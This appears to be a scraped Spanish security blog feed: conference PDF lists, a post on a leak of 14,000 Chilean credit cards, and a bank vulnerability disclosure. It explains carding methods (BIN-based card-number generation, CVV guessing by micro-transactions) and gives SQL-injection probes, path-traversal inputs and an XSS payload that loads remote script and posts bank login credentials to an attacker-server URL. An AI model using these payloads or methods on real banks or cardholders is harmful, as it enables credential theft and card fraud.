Alexandre-Borges-Ring-02-Rootkits-bypassing-defenses.pdf
Alfonso-Garcia-and-Alejo-Murillo-Playback-a-TLS-story.pdf
Crowley-Paredes-Savage-Outsmarting-the-Smart-City.pdf
Eckert-Sumner-Krause-Inside-the-Fake-Science-Factory.pdf
Eduardo-Izycki-And-Rodrigo-Colli-Digital-Leviathan-Nation-State-Big-Brothers.pdf
Egypt-One-Liners-to-Rule-Them-All.pdf
Fireside-Panel-D0-N0-H4RM.pdf
Fireside-Panel-Goerzen-and-Matthews-Beyond-The-Lulz-Updated.pdf
Fireside-Panel-Goerzen-and-Matthews-Beyond-The-Lulz.pdf
Foster-and-Ayrey-Lost-and-Found-Certs-residual-certs-for-pre-owned-domains.pdf
Galloway-and-Yunusov-For-the-love-of-Money-Finding-And-Exploiting-Vulns-In-Mobile-POS-Updated.pdf
Ian-Haken-Automated-Discovery-of-Deserialization-Gadget-Chains.pdf
Jianjun-Dai-Guang-Gong-Wenlin-Yang-Pwning-The-Toughest-Target-Updated.pdf
Jianjun-Dai-Guang-Gong-Wenlin-Yang-Pwning-The-Toughest-Target.pdf
Joe-Grand-Searching-for-the-Light-Adventures-w-Opticspy.pdf
Josep-Rodriguez-Breaking-Extreme-Networks-WingOS-Updated.pdf
Lawshae-Who-Controls-the-Controllers-Hacking-Crestron.pdf
Maggie-Mayhem-Sex-Work-After-SESTA.pdf
Maksim-Shudrak-Fuzzing-Malware-For-Fun-and-Profit.pdf
Matt-King-Micro-Renovator-Bringing-Proc-Firmware-Up-To-Code.pdf
Matt-Knight-and-Ryan-Speers-RF-Fuzzing-Tools-to-Expose-PHY-Layer-Vulns.pdf
Matt-Wixey-Betrayed-by-the-Keyboard-Updated.pdf
Matt-Wixey-Betrayed-by-the-Keyboard.pdf
Matthews-Adams-Greco-Youre-Just-Complaining-Because-Youre-Guilty.pdf
Michael-Ossmann-and-Dominic-Spill-Revolting-Radios.pdf
Min-Zheng-Xiaolong-Bai-Fasten-your-Seatbelts-Escaping-iOS-11-Sandbox.pdf
Nils-Amiet-and-Yonal-Romailler-Reaping-and-breaking-keys-at-scale-when-crypto-meets-big-data.pdf
Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-and-Pop-0days-Out.pdf
Panel-DCGroups.pdf
Paternotte-and-van-Ommeren-It-WISNt-Me-Attacking-Industrial-Wireless-Mesh.pdf
Rachel-Greenstadt-and-Aylin-Caliskan-De-anonymizing-Programmers.pdf
Richard-Thieme-The-Road-to-Resilience .pdf
Rob-Joyce-Absurd-Xmas-Lights.pdf
Rousseau-and-Seymour-Finding-Xori-Malware-Analysis-Triage-w-Auto-Disassembly.pdf
Seamus-Burke-Journey-Into-Hexagon.pdf
Sean-Metcalf-Exploiting-Administrator-Insecurities.pdf
Shortxstack-and-Seth-Law-Building-the-Hacker-tracker.pdf
Si-and-AgentX-Wagging-The-Tail.pdf
Steven-Danneman-Your-Banks-Digital-Side-Door.pdf
Yaniv-Balmas-What-The-FAX.pdf
YawnBox-Emerald-Onion-Privacy-Infrastructure-Challenges-and-Opportunites.pdf
Yu-Wang-Attacking-The-MacOS-Kernel-Graphics-Driver.pdf
Yuwei-Zheng-Shaokun-Cao-Bypass-the-SecureBoot-and-etc-on-NXP-SOCs-Updated.pdf
Yuwei-Zheng-Shaokun-Cao-Bypass-the-SecureBoot-and-etc-on-NXP-SOCs.pdf
zerosum0x0-Eternal-Exploits.pdf

También se realizaron workshops que puedes descargar todos en formato RAR, por torrent o cada archivo por separado:

Fuente: https://www.cyberhades.com

Hackeando un Banco 3 ["Hackear" 14.000+ Tarjetas de Crédito (Carding)]

noreply@blogger.com (Leo Romero) — Thu, 26 Jul 2018 16:26:00 -0400

Recientemente en la prensa chilena ha causado bastante estragos diferentes noticias relacionadas con la mala seguridad informática con la que cuentan los bancos en Chile [1] [2] [3], ayer una filtración de más de 14 mil tarjetas de crédito de bancos chilenos provocaban el pánico de muchos, incluso de las autoridades (senador) [4]. Obligando a los bancos a dar explicaciones y bloquear las cuentas afectadas por esta filtración [5], para disminuir el impacto en la opinión pública.

Y la verdad, es que no hay que entrar en pánico ya que esta situación es más normal de lo que creen y no solo en Chile, si no, en el mundo entero...

¿Qué es el carding?

Carding es un término que describe el tráfico de tarjetas de crédito, cuentas bancarias y otra información personal en línea, así como los servicios relacionados con el fraude. Las actividades también abarcan la adquisición de detalles personales, y técnicas de lavado de dinero [6].

Hay una gran cantidad de métodos para adquirir tarjetas de crédito, datos financieros y personales. La forma más común de obtenerlos es generando número de tarjetas de créditos válidas de forma semiautomática a partir de secuencias conocidas a través de un "BIN attack"[7].

Los métodos de seguridad de las tarjetas de créditos son 2:

CVV: código numérico de largo 3. Mil combinaciones posibles, del 000 al 999 secuencialmente.
Fecha de expiración: mes y año. Los meses son 12. Los años son máximo 10.

Sabiendo un número de tarjeta de crédito, el CVV y la fecha de expiración, se pueden hacer compras online sin problemas (por montos menores al cupo de la tarjeta).

BIN attack

BIN se le llama a los 6 primeros dígitos de una tarjeta de crédito, estos 6 primero dígitos definen el país y la entidad bancaria a la que pertenece esta tarjeta de crédito.

El formato de un número de tarjeta de crédito es:

4444 5555 6666 7777

Siendo 444455 el BIN de la tarjeta. Y 5566667777 el número que identifica al usuario al que pertenece la tarjeta.

Como podemos ver, cada entidad bancaria en el mundo puede emitir un máximo de 10 mil millones de tarjetas de crédito partiendo de la tarjeta 4444 5500 0000 0000 a la 4444 5599 9999 9999 secuencialmente. Bastante ¿no?.

Lamentablemente la asignación de números de tarjetas de créditos muchas veces responden a patrones, por tanto, es muy fácil generar número de tarjeta de créditos válidas, por ejemplo, si tengo una tarjeta que sé que es válida puedo generar secuencialmente otras válidas (más adelante se hace un mejor análisis).

4444 55111111 1111 [válida] -> 4444 55111111 1112 [válida también]

Por otro lado, existen bases de datos con BINs y su respectiva entidad bancaria, que se venden o son abiertos [8].

Mundo carding

Siempre que hablemos de dinero fácil, existirá una comunidad enorme que participe de ese ecosistema, en el caso del carding, su comunidad es muy grande donde participan millones de personas que compran y venden datos bancarios o de tarjetas de crédito para obtener productos o servicios a costo 0.

Aquí vemos algunos ejemplos que se encuentran fácil y abiertamente:

Foro para compartir (vender) número de tarjetas de crédito, técnicas de compra y lavado de dinero.

Web de venta de TC y Dumps

Web de venta de TC

La impunidad a este tipo de delitos es tan grande que las webs de venta son completamente abiertas (no están en TOR o la Deep Web) y promocionan sus servicios en varias partes.

Literatura carding

Así como los métodos de seguridad de las tarjetas de créditos son insuficientes, existe gran cantidad de literatura donde se enseña a generar números de tarjetas de créditos, técnicas de ingeniería social para obtener datos, técnicas de lavado de dinero, técnicas para obtener el CVV de una tarjeta, etc.

Manuales carding

Esta misma literatura clasifica a las tarjetas de crédito en 3 niveles, según dificultad:

Level 1 (Easy carding): Se puede gastar un máximo de 50 dólares. Se necesita:

Tarjeta de crédito.
Fecha de expiración.

Level 2 (Intermediate carding): Se puede gastar un máximo de 2000 dólares. Se necesita:

Tarjeta de crédito
Fecha de expiración
Código CVV,
Nombre del cliente
Número de la cuenta bancaria.

Level 3 (Hard carding): No hay limites establecidos de gasto. Se necesita:

Tarjeta de crédito
Fecha de expiración
Código CVV,
Nombre del propietario.
Número de la cuenta bancaria.
Cantidad de dinero en la cuenta.
Número de teléfono.
SSN.
DOB.

Como podemos ver, el nivel 1 no se requiere de mucha información, simplemente el número de la tarjeta de crédito, el año y mes de expiración, realmente easy.

Herramientas carding

Esta comunidad del delito no solo tiene lugares de comunicación y literatura extensa, también tienen un sin fin de herramientas que sirven para diferentes finalidades, a continuación les mostraré dos herramientas, la primera sirve para que con un dump (llamado así a una base de datos con tarjetas de crédito, CVV y fecha de expiración pero sin validar), puedo verificar el banco, país y tipo de cuenta y la segunda herramienta sirve para validar los datos de una tarjeta de crédito.

A la herramienta a continuación se le tienen que ingresar los 6 primeros dígitos de las tarjetas de crédito, y está te dirá de que banco y que tipo de cuenta le corresponde:

Se ingresan los BINS:

Y se obtienen los resultados:

La segunda herramienta es muy sencilla y sirve para poder verificar el CVV y fecha de expiración de una tarjeta de crédito, realizando una micro transacción:

Ataque distribuido para adivinar CVV

Como dijimos anteriormente el CVV viene a ser el código de (in)seguridad de las tarjetas de crédito. Un número de largo 3, con mil combinaciones posibles, muy difícil de adivinar...

Pues bueno, ya se venden herramientas y servicios que consultan en mil comercios digitales los mil CVV posibles de una tarjeta de crédito, haciendo una micro compra, por lo general de menos de un dólar que cuando es aceptado significa que el CVV es correcto.

No eres tú, es tu tarjeta de crédito

Cuando se crearon las tarjetas de crédito, se diseñaron para que la gente gastara su dinero rápidamente y no tuviera problemas ni burocracias, en esa misma linea, la seguridad significaba burocracias, agregar contraseñas seguras significaba valiosos segundos que perdía el sistema bancario, o la gente podía olvidarlas fácilmente, por lo cual se decidió por el mínimo de seguridad posible, SIN SEGURIDAD.

Si tienes físicamente la tarjeta de crédito, no necesitas ni el CVV, ni la fecha de expiración, simplemente compras y ya. Y si compras a través de Internet montos menores a 50 dólares, vas a necesitar una fecha de expiración y a veces el CVV. Esos métodos de seguridad son irrisorios y como dije anteriormente, se diseñaron para que la gente gastara y no para que la gente guardara su dinero.

¿Por qué nadie hace nada?

Hace muchos años VISA y MasterCard están trabajando en mejorar la seguridad, pero no lo han logrado, ya que cualquier sistema de seguridad haría que las personas comprasen menos; poner una contraseña o verificación en dos pasos significaría agregar una barrera a la compra. Por eso es que han puesto todas sus fichas a la tecnología contactless. Si antes era inseguro que te robaran la tarjeta de crédito, ahora simplemente tienen que estar cerca tuyo para cobrarte una transacción.

El seguro paga y el banco hace vista gorda

Como vimos, la seguridad de las tarjetas es pésima, y es muy normal que clientes del banco llamen para hacer notar que hay cobros irregulares en sus tarjetas de crédito. En la mayoría de los casos tu banco rápidamente te devuelve el dinero y te dice que fue un error, pero lo que realmente sucede es que un delincuente informático obtuvo el número de tu tarjeta de crédito o lo generó y realizó una compra fraudulenta en un país cercano a Rusia, el ejecutivo de cuenta se percata que evidentemente es un robo y lo notifica al sistema de riesgo, donde lo notifican como robo para que el seguro pague, luego te mandan un mail pidiendo disculpas, un mes después te llega una nueva tarjeta de crédito por correo o te anuncian que por ser buen cliente puedes tener una tarjeta más linda que puedes pasar a buscar.

Este comportamiento está tan arraigado en la cultura de los bancos que cuando suceden estos robos no se notifican, el protocolo es que pasen lo más desapercibidos posibles. Esto se debe a que el costo de implementar seguridad - y por ende disminuir el volumen de transacciones realizadas - es mayor que el costo de afrontar el pago de seguros asociados al robo de dinero de tarjetas de crédito. En la filtración que les hablaré a continuación, ninguno de los bancos afectados le notificó a la PDI (policía de investigaciones de Chile) lo sucedido [9].

Análisis de las 14 mil tarjetas de créditos filtradas

Lo primero que hay que notar es que la gran mayoría de las tarjetas de crédito ya habían expirado, lo segundo es que los bancos notificaron que el 90% de las tarjetas ya no eran funcionales, por lo cual estamos hablando de un dump basura (se gasta más verificando los datos que obteniendo dinero).

Segundo podemos notar que los nombres no fueron sacados de una base de datos única, más bien los fueron anotando a mano (mayúsculas, minúsculas, banco, nombre, tipo de cuenta, no existe un formato relacional) a medida que obtenían los datos.

Lo tercero es que podemos notar que hicieron un esfuerzo por "desordenar" la base de datos, pero si la ordenas por número te tarjetas de crédito, nos damos cuenta que las cuentas fueron generadas secuencialemente, esto se logra teniendo como base una cuenta válida y cambiándole los último 5 dígitos secuencialmente o aleatoriamente, es muy probable encontrar más números cercanos válidos.

En resumen como podemos ver, esta fue una base de datos que se obtuvo de varias fuentes, muchas se obtuvieron generándolas a partir de otras válidas y verificando los datos. Pero fue hecha 100% a mano, sin técnicas avanzadas de informática o "hackeo".

Base de datos obsoleta y distracción

Es evidente que los delincuentes que filtraron la base de datos NO son el grupo de hackers "ShadowBrokers"[10] que se infiltraron en la NSA y lograron obtener información y herramientas de hacking. Son simplemente carders, personas que de oficio compran y venden datos de tarjetas de créditos, y aprovecharon el ambiente de inseguridad informática bancaria que se vive en Chile para hacerle daño a la banca.

La base de datos filtrada se considera basura o de muy poco valor, y cuando tu base de datos pierde valor ya que las cuentas ya están expiradas, lo que haces es liberarla como si fuera una parte de una gran base de datos, ofreciendo la base de datos "real" por dinero.

Piden 200 BTC por la base de datos completa y las herramientas que usaron para crearla... esos BTCs al día de hoy son 1,6 millones de dólares, un precio ridículamente alto que hace notar que no existe dicha base de datos "completa".

El nombre ShadowBrokers lo eligieron con la finalidad de "distraer" a los investigadores y hacerles creer que son un súper grupo de hackers internacionales, cuando en la realidad deben ser chilenos o de la región y con muy poco conocimiento informático (ya que si lo tuvieran habrían pedido Monero y no BTC). Por último y otra distracción, piden la liberación de 3 tipos que no existen, nada concuerda en su discurso.

Prensa

El afamado grupo de hackers profesionales que se infiltró en la NSA y robó con técnicas avanzadas sus más preciados secretos y 0days, han vuelto a atacar y esta vez decidieron hacerlo en Chile, hackeando a todos los bancos y obteniendo sus tarjetas de crédito, filtrándolas para destruir el sistema bancario chileno al más puro estilo Mr Robot.

Prácticamente así es como la prensa en Chile informa sobre este filtración, siempre me da un poco de vergüenza lo sensacionalistas y poco informados que son los medios al momento de informar. Se nota que no le preguntan a nadie que sepa un poco de informática antes de escribir tanta desinformación, generando caos y pánico público.

Usan el término "hacker" como sinónimo de delincuente informático, a pesar de que no se haya usado nada informático en el proceso, por ejemplo en una noticia donde un delincuente estafa a personas por internet, lo llaman "hacker de alto conocimiento informático" y lo único que hace en la realidad es poner mensajes en Facebook ofreciendo propiedades que no son de él.

Por último en un canal de televisión local apareció un "experto" en seguridad informática explicando que el ataque fue perpetrado por los mismos que hackearon la NSA y que realizaron el "wannacry", que vergüenza.

Artículos anteriores

Hackeando un Banco (Caso Real) [XSS + Sensitive Data Exposure + explicación SQLi] (16 abr. 2018)
Hackeando un Banco 2 (Caso Real) [Transferir Dinero + Comprar Gratis] (26 abr. 2018)

Bibliografía

[+] Saludos

Hackeando un Banco 2 (Caso Real) [Transferir Dinero + Comprar Gratis]

noreply@blogger.com (Leo Romero) — Thu, 26 Apr 2018 18:46:00 -0300

El día de ayer se realizó el LatamTour2018 en Chile, y el investigador Eduardo Riveros realizó una charla donde:

Se analiza el caso real de un portal chileno, con serios fallos de seguridad. Dónde aún después de 6 meses de ser advertido, no logra corregir sus vulnerabilidades. Se describirá las recomendaciones para disminuir o eliminar los riesgos detectados.

La charla llamada "Gran promo: Todas tus compras Gratis" habla sobre como fue posible :

Transferir dinero con autorizaciones modificadas para parecer "regalos".
Pagar productos con el dinero de cualquier cliente del banco sin datos de autorización (usuario(RUT)/contraseña).

Lo anecdótico de la situación, es que el Banco afectado es exactamente el mismo del cual hablo en Hackeando un Banco (Caso Real), y saca las mismas conclusiones con respecto a la falta de canales para notificar vulnerabilidades y la lentitud inexplicable para arreglarlos, sin duda preocupante.

Acá los dejo con la charla:

Las diapositivas:

Fuentes:

[+] Salu2

Hackeando un Banco (Caso Real) [XSS + Sensitive Data Exposure + explicación SQLi]

noreply@blogger.com (Leo Romero) — Mon, 16 Apr 2018 10:23:00 -0300

Hace tiempo que no escribo, pero ahora amerita la ocasión... Estoy acostumbrado a escribir reportes de seguridad de las vulnerabilidades que encuentro en los sitios webs que visito, para mandárselo al encargado del sitio o webmaster. Normalmente cuando se encuentra un bug, es muy probable que se encuentren muchos más ya que en la mayoría de casos los errores los encuentro poniendo un "<marquee>" o una comilla simple en cualquier parámetro GET o POST que encuentre. Ejemplo:

http://www.sitio.com/index.php?id=1<marquee>
http://www.sitio.com/index.php?id=1'

Como ya muchos sabrán el primero es para encontrar XSS y el segundo para encontrar SQLi, pero también sirven para encontrar LFI, Remote File Inclusion, Directory file include, inyección de código, inyección de comandos... Existen muchos tipos de vulnerabilidades que se pueden encontrar con una simple comilla o un carácter no alfanumérico.

En el primer caso ( ?id=1<marquee> ) si la página se mueve es vulnerable a XSS, si en algún campo de la web aparece <marquee> todavía es vulnerable a XSS pero hay que buscar algún bypass y eso es aburrido y tedioso.

En el segundo caso ( ?id=1' ), solo voy a explicar el caso del SQLi ya que no es la finalidad de este post explicar en detalle todos los tipos de ataques, esta es solo la introducción de a lo que quiero llegar... Pues bueno, si al poner la comilla simple lanza un Error 404 (Not Found) probablemente el sitio no sea vulnerable a SQLi, pero si te encuentras con un error del tipo:

You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the
right syntax to use near '\'' at line 1

Significa que es vulnerable a SQLi, si no aparece ese mensaje, pero el servidor responde un Error 500 (Internal Server Error) o no responde nada (la página queda en blanco o no muestra resultados) hay que remplazar la comilla por un and 1=1 y por un and 1=2 Ejemplo:

http://www.sitio.com/index.php?id=1 and 1=1
http://www.sitio.com/index.php?id=1 and 1=2

Si en el primer caso el contenido aparece bien, igual que sin el and 1=1, y en el segundo caso no aparece nada, significa que es vulnerable a Blind SQLi.

Como ven, con simples 2 o 3 pasos que verifiques cada vez que visites una web y veas algún ?parameter=value en la bara de direcciones, puedes encontrar muchos sitios webs vulnerables a diferentes tipos de ataques como los descritos arriba. (*Nota: muchos parámetros están embellecidos como rutas, por ende también puedes encontrar parámetros GET que se pasan con el formato /parameter/value)

Es en esa rutina de poner comillas me encuentro con que en el sitio web de un importante Banco, donde pongo una comilla en un parámetro script.aspx?Id=12' y encuentro un error que filtra mucha información del servidor donde se aloja:

Esta es una vulnerabilidad llamada Sensitive Data Exposure, el problema radica en que está activado el modo debug o modo desarrollador, por lo tanto se puede ver un útil reporte del error para los desarrolladores, pero que muestra demasiada información a terceros.

Datos obtenidos:

Sistema operativo del servidor.
Versión .NET Microsoft Framework.
Versión ASP.NET.
Ruta absoluta del proyecto en el servidor.
Extractos de código múltiple errores y logs.

A primera vista no pareciera ser una vulnerabilidad seria, pero un hacker puede usar esta información para buscar la aplicación y su versión en repositorios de vulnerabilidades y exploits, para verificar si existe algún exploit listo para descargar, ejecutar y tomar el sistema. Por otro lado, solo le damos más información a un atacante para que busque vulnerabilidades más serias en el resto de las rutas y logs filtrados.

Por suerte para el Banco al intentar inyectar código no se puede ya que las parámetros son saneados (a los valores se les quita algunos caracteres famosos por ser usados para inyectar código como por ejemplo ' < >), pero aun así se pueden inducir diferentes errores:

https://www.banco.xxx/ruta/script.aspx?Id=58l
Error: Could not find a part of the path "C:\ruta\home58l\link.inc".

https://www.banco.xxx/ruta/script.aspx?Id=58:1
Error: Invalid path for MapPath '/ruta/home58:1//link.inc'. A virtual path is expected.

https://www.banco.xxx/ruta/script.aspx?Id=58"l
Error: Illegal characters in path.

También se puede inyectar la ruta de otra carpeta, pero por suerte para el Banco, a la consulta se le concatena el nombre de un archivo que debe existir dentro de la carpeta, así que solo se puede ver contenido de carpetas con el archivo concatenado en la consulta.

https://www.banco.xxx/ruta/script.aspx?Id=58/../carpeta59/
200 OK!

Por mi falta de conocimiento en ASP y NET es que me rindo de intentar buscar más formas de vulnerar el sistema, y como dije antes, si encuentras una vulnerabilidad, es posible que encuentres muchas más... Es así como encuentro un XSS:

https://www.banco.xxx/ruta/script.aspx?Id=58<marquee>

Se mueve todo así que es vulnerable a XSS, ahora pruebo con una imagen:

Dos de los ataques más comunes que se pueden hacer para sacar provecho de un XSS, es el robo de cookies de sesión y la suplantación de formularios de acceso (usuario/contraseña). El robo de cookies no será efectivo ya que el Banco tiene un sistema de sesiones únicas por ende la cookie sólo sirve para recibir un mensaje de error, por tanto decido una suplantación de formularios de acceso.

La forma más fácil de hacer esto es inyectando un código javascript que borre todo el contenido en la página web legítima y ponga los formularios para mandar las credenciales a un servidor que controle el atacante.

https://www.banco.xxx/ruta/script.aspx?Id=97"><script type="text/javascript" src="http://yourjavascript.com/000000/a.js"></script>
o
https://www.banco.xxx/ruta/script.aspx?Id=97%22%3E%3Cscript%20type=%22text/javascript%22%20src=%22http://yourjavascript.com/000000/a.js%22%3E%3C/script%3E

El javascript es muy sencillo y su sintaxis es esta:

var html = `
<html>
<body>
<h1>Página web del Banco</h1>
<p><marquee>El banco más seguro del mundo.</marquee></p>
</body>
</html>
`;

document.body.innerHTML = html;

Dentro de var html = `<!-code here->`; se copia y pega el código de la página web de acceso del sitio web légitimo, se debe cambiar las rutas relativas agregando la url de la web original:

De: <link rel="stylesheet" type="text/css" href="/login/assets/style.css">
A:  <link rel="stylesheet" type="text/css" href="https://www.banco.xxx/login/assets/style.css">

Por último y más importante, se debe reemplazar el action del formulario a un script en PHP que guarde las credenciales en un servidor controlado por el atacante:

De: <form action="/login.php" method="post">
A:  <form action="https://hacker-server.com/pass.php" method="post">

Se puede ir viendo como queda el resultado apretando F12 en cualquier web y pegando el código en la consola javascript:

Como es una prueba de concepto para mandar un reporte con la vulnerabilidad, el script en PHP que intercepta las credenciales simplemente será un script que muestre los parámetros POST en pantalla:

<?php
echo "<pre>";
print_r($_POST);
echo "</pre>";
?>

Ya todo está listo y el PoC funciona perfecto:

Y cuando ingresan sus credenciales se envían al servidor del atacante:

Envío del reporte y respuestas

Una vez con el reporte listo y con el PoC funcionando intento buscar alguna forma de contactarme con el Banco para enviárselo... No encuentro nada, así que uso una herramienta llamada contact.sh que es un script que intenta varios métodos y convenciones para encontrar al encargado de un sitio web... Y nada nuevamente, así que me digno a escribirles a través de Twitter y me responden diciendo que escriba a un correo que me dieron.

Escribo al correo proporcionado y no me responden en varios días, ni siquiera un "Recibido, muchas gracias", así que de nuevo pido a través de Twitter algún mail para poder enviar el reporte.... YYY, visto!

A la semana me llega un mail:

Como pueden ver me mandaron el mail de un especialista en marketing y clientes, y no el de un especialista en seguridad, probablemente esas dos áreas estén muy separadas dentro del Banco y ni si quiera se comuniquen, así que el reporte de seguridad quedó archivado como un reclamo de cliente...

Y un día después del mail me llaman:

Yo: Alo?
Telefonista: Hola, llamamos del Banco X para informarte que tu reclamo fue derivado al área que corresponde.
Yo: No es un reclamo, es un reporte de seguridad. A qué área lo derivaron?
Telefonista: No lo sé, nosotros somos el área de clientes, pero te van a contactar!
Yo: Ok! Gracias por la información, Adiós!....... Espera, tienen Bug Bounty?
Telefonista: [Cuelga]

Hasta el día de hoy, nadie me ha contactado y las vulnerabilidades se mantienen exactamente como el primer día que las reporté. Ya pasó más de un mes y al parecer no hay intención de arreglarlo, así que me decidí a escribir este post.

Conclusiones

Los XSS son vulnerabilidades que tienen un impacto bajo hoy en día, el ataque que mostré arriba, solo puede ser replicado en Firefox ya que todos los demás browsers bloquean los posibles XSS, eso no exime de responsabilidades a los encargados de seguridad. Como pueden ver también el Banco no tiene protocolos para reportar bugs y mucho menos un programa de Bug Bounty. La situación es peor ya que investigando un poco más, el Banco terceriza el desarrollo de aplicaciones (contrata una empresa externa para que las haga), eso en muchos casos es útil, pero en un Banco que maneja datos sensibles de clientes no debería tener permitido traspasar datos a empresas externas, menos delegar la seguridad a ellos. Hay que notar también que las tecnologías usadas para el desarrollo de aplicaciones bancarias ya están obsoletas y los problemas presentados anteriormente son en gran medida por usar Frameworks anticuados que no validan como corresponden los inputs y malas configuraciones.

Las pruebas de concepto que se presentan arriba fueron realizadas con la finalidad de demostrar el impacto que pueden tener y en ningún momento fueron usadas con otra finalidad.

[+] Salu2
[!] Zion3R

Presentaciones de Black Hat USA 2017 (PDF)

noreply@blogger.com (Leo Romero) — Sat, 5 Aug 2017 14:01:00 -0400

La semana pasada publiqué una entrada con las presentaciones de la DEF CON 25 y está vez es la oportunidad de las presentaciones de Black Hat USA 2017, sin duda es un material de primera y recomiendo que vean al menos las presentaciones que les llamen la atención:

Stepping Up Our Game: Re-focusing the Security Community on Defense and Making Security Work for Everyone
‘Ghost Telephonist’ Link Hijack Exploitations in 4G LTE CS Fallback
- Yuwei-Ghost-Telephonist-Link-Hijack-Exploitations-In-4G-LTE-CS-Fallback.pdf
(in)Security in Building Automation: How to Create Dark Buildings with Light Speed
- Brandstetter-insecurity-In-Building-Automation-How-To-Create-Dark-Buildings-With-Light-Speed.pdf
- Brandstetter-insecurity-In-Building-Automation-How-To-Create-Dark-Buildings-With-Light-Speed-wp.pdf
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages!
- Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf
Advanced Pre-Breach Planning: Utilizing a Purple Team to Measure Effectiveness vs. Maturity
Adventures in Attacking Wind Farm Control Networks
- Staggs-Adventures-In-Attacking-Wind-Farm-Control-Networks.pdf
All Your SMS & Contacts Belong to ADUPS & Others
- Johnson-All-Your-SMS-&-Contacts-Belong-To-Adups-&-Others.pdf
- Johnson-All-Your-SMS-&-Contacts-Belong-To-Adups-&-Others-wp.pdf
An ACE Up the Sleeve: Designing Active Directory DACL Backdoors
- Robbins-An-ACE-Up-The-Sleeve-Designing-Active-Directory-DACL-Backdoors.pdf
- Robbins-An-ACE-Up-The-Sleeve-Designing-Active-Directory-DACL-Backdoors-wp.pdf
And Then the Script-Kiddie Said Let There be No Light. Are Cyber-Attacks on the Power Grid Limited to Nation-State Actors?
- Keliris-And-Then-The-Script-Kiddie-Said-Let-There-Be-No-Light-Are-Cyberattacks-On-The-Power-Grid-Limited-To-Nation-State-Actors-wp.pdf
Attacking Encrypted USB Keys the Hard(ware) Way
Automated Detection of Vulnerabilities in Black-Box Routers (and Other Network Devices)
Automated Testing of Crypto Software Using Differential Fuzzing
- Aumasson-Automated-Testing-Of-Crypto-Software-Using-Differential-Fuzzing.pdf
AVPASS: Leaking and Bypassing Antivirus Detection Model Automatically
- Jung-AVPASS-Leaking-And-Bypassing-Anitvirus-Detection-Model-Automatically.pdf
Behind the Plexiglass Curtain: Stats and Stories from the Black Hat NOC
Betraying the BIOS: Where the Guardians of the BIOS are Failing
- Branco-Firmware-Is-The-New-Black-Analyzing-Past-Three-Years-Of-BIOS-UEFI-Security-Vulnerabilities
Big Game Theory Hunting: The Peculiarities of Human Behavior in the InfoSec Game
- Shortridge-Big-Game-Theory-Hunting-The-Peculiarities-Of-Human-Behavior-In-The-Infosec-Game.pdf
Blue Pill for Your Phone
Bochspwn Reloaded: Detecting Kernel Memory Disclosure with x86 Emulation and Taint Tracking
- Jurczyk-Bochspwn-Reloaded-Detecting-Kernel-Memory-Disclosure-With-X86-Emulation-And-Taint-Tracking.pdf
Bot vs. Bot for Evading Machine Learning Malware Detection
- Anderson-Bot-Vs-Bot-Evading-Machine-Learning-Malware-Detection.pdf
- Anderson-Bot-Vs-Bot-Evading-Machine-Learning-Malware-Detection-wp.pdf
Break
Breakfast (Sponsored by FireEye McAfee Qualys & Tenable Network Security)
Breaking Electronic Door Locks Like You’re on CSI: Cyber
- OFlynn-Breaking-Electronic-Locks.pdf
Breaking the Laws of Robotics: Attacking Industrial Robots
- Quarta-Breaking-The-Laws-Of-Robotics-Attacking-Industrial-Robots.pdf
- Quarta-Breaking-The-Laws-Of-Robotics-Attacking-Industrial-Robots-wp.pdf
Breaking the x86 Instruction Set
- Domas-Breaking-The-x86-ISA.pdf
- Domas-Breaking-The-x86-Instruction-Set-wp.pdf
Broadpwn: Remotely Compromising Android and iOS via a Bug in Broadcom’s Wi-Fi Chipsets
Bug Collisions Meet Government Vulnerability Disclosure
- Ablon-Bug-Collisions-Meet-Government-Vulnerability-Disclosure-Zero-Days-Thousands-Of-Nights-RAND.pdf
- Herr-Bug-Collisions-Meet-Government-Vulnerability-Disclosure-Taking Stock - Vulnerability-Rediscovery-HKS.pdf
Business Hall Welcome Reception (Sponsored by Forcepoint McAfee LogRhythm & Tenable Network Security)
Challenges of Cooperation Across Cyberspace
Champagne Toast (Sponsored by ESET North America Fidelis Cybersecurity Fortinet Leidos Palo Alto Networks Raytheon & Symantec)
Cloak & Dagger: From Two Permissions to Complete Control of the UI Feedback Loop
- Fratantonio-Cloak-And-Dagger-From-Two-Permissions-To-Complete-Control-Of-The-UI-Feedback-Loop.pdf
- Fratantonio-Cloak-And-Dagger-From-Two-Permissions-To-Complete-Control-Of-The-UI-Feedback-Loop-wp.pdf
Coffee Service
Cracking the Lens: Targeting HTTP’s Hidden Attack-Surface
- Kettle-Cracking-The-Lens-Exploiting-HTTPs-Hidden-Attack-Surface.pdf
- Kettle-Cracking-The-Lens-Exploiting-HTTPs-Hidden-Attack-Surface-wp.pdf
- Kettle-Cracking-The-Lens-Exploiting-HTTPs-Hidden-Attack-Surface-tool.zip
Cyber Wargaming: Lessons Learned in Influencing Security Stakeholders Inside and Outside Your Organization
- Nichols-Cyber-Wargaming-Lessons-Learned-In-Influencing-Stakeholders-Inside-And-Outside-Your-Organization.pdf
- Nichols-Cyber-Wargaming-Lessons-Learned-In-Influencing-Stakeholders-Inside-And-Outside-Your-Organization-wp.pdf
Datacenter Orchestration Security and Insecurity: Assessing Kubernetes Mesos and Docker at Scale
Defeating Samsung KNOX with Zero Privilege
- Shen-Defeating-Samsung-KNOX-With-Zero-Privilege.pdf
- Shen-Defeating-Samsung-KNOX-With-Zero-Privilege-wp.pdf
Delivering Javascript to World+Dog
- Randolph-Delivering-Javascript-to-World-Plus-Dog.pdf
- Randolph-Delivering-Javascript-to-World-Plus-Dog-wp.pdf
Developing Trust and Gitting Betrayed
Digital Vengeance: Exploiting the Most Notorious C&C Toolkits
- Grange-Digital-Vengeance-Exploiting-The-Most-Notorious-C&C-Toolkits.pdf
- Grange-Digital-Vengeance-Exploiting-The-Most-Notorious-C&C-Toolkits-wp.pdf
Don’t Trust the DOM: Bypassing XSS Mitigations via Script Gadgets
- Lekies-Dont-Trust-The-DOM-Bypassing-XSS-Mitigations-Via-Script-Gadgets.pdf
Electronegativity - A Study of Electron Security
- Carettoni-Electronegativity-A-Study-Of-Electron-Security.pdf
- Carettoni-Electronegativity-A-Study-Of-Electron-Security-wp.pdf
Escalating Insider Threats Using VMware’s API
- Ziv-Escalating-Insider-Threats-Using-Vmware’s-Api.pdf
Evading Microsoft ATA for Active Directory Domination
